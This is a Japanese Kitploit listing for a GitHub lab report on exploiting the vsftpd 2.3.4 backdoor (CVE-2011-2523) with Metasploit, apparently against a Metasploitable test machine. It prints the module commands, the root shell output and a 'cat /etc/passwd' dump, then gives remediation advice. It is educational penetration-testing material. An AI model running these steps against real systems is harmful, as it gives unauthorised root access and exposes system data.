Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
vsftpd-234-vuln-report — Metasploitを使用したvsftpd 2.3.4(CVE-2011-2523)の脆弱性評価と悪用。完全なレポートとrootアクセスの証明が含まれています。 | Kitploit
ツール/GitHubGitHub/vedpakhare/vsftpd-234-vuln-report
エクスプロイトフレームワーク脆弱性分析エクスプロイトペネトレーションテスト学習と教育ペイロード開発
GitHubvedpakhare/vsftpd-234-vuln-report

vsftpd-234-vuln-report

Metasploitを使用したvsftpd 2.3.4(CVE-2011-2523)の脆弱性評価と悪用。完全なレポートとrootアクセスの証明が含まれています。

リポジトリを見る
21年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
ウェブサイト

💥 vsftpd 2.3.4 バックドア悪用レポート

Metasploit を使用した vsftpd 2.3.4 の既知の脆弱性の悪用。

📌 ターゲット情報

  • ターゲット IP: 192.168.150.133
  • サービス: FTP
  • 脆弱性のあるバージョン: vsftpd 2.3.4
  • エクスプロイトモジュール: exploit/unix/ftp/vsftpd_234_backdoor
  • ペイロード: コマンドシェル (TCP)

🔍 脆弱性の概要

vsftpd 2.3.4 には、特別に細工されたユーザー名(末尾が :))を受信するとポート 6200 でコマンドシェルを開く悪意のあるバックドアが含まれています。

CVE: CVE-2011-2523


🚀 悪用手順

root@kitploit:~
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS 192.168.150.133
run

💥 シェルアクセス取得成功:

root@kitploit:~
whoami
> root

id
> uid=0(root) gid=0(root)

hostname
> metasploitable

uname -a
> Linux metasploitable 2.6.24-16-server #1 SMP ...

cat /etc/passwd
> root:x:0:0:root:/root:/bin/bash
  daemon:x:1:1:daemon:/usr/sbin:/bin/sh
  ...

🔐 影響

ルートシェルへのアクセスにより、攻撃者は標的システムを完全に制御できます。これには、権限昇格、横展開、データ窃取、永続的アクセスが含まれます。


✅ 推奨事項

  • vsftpd 2.3.4 を使用しないでください。
  • セキュリティが確保され、サポートされているバージョンにアップグレードしてください。
  • FTP への外部アクセスを制限してください。
  • ポート 6200 の不審なトラフィックを監視してください。

📄 レポート

📝 完全な PDF レポートはこのリポジトリにあります: vsftpd-exploit-report.pdf


📚 参考資料

  • Rapid7 モジュール情報
  • CVE-2011-2523 - NVD

👨‍💻 作者

vedpakhare が 🔥 を込めて作成

ツールをダウンロード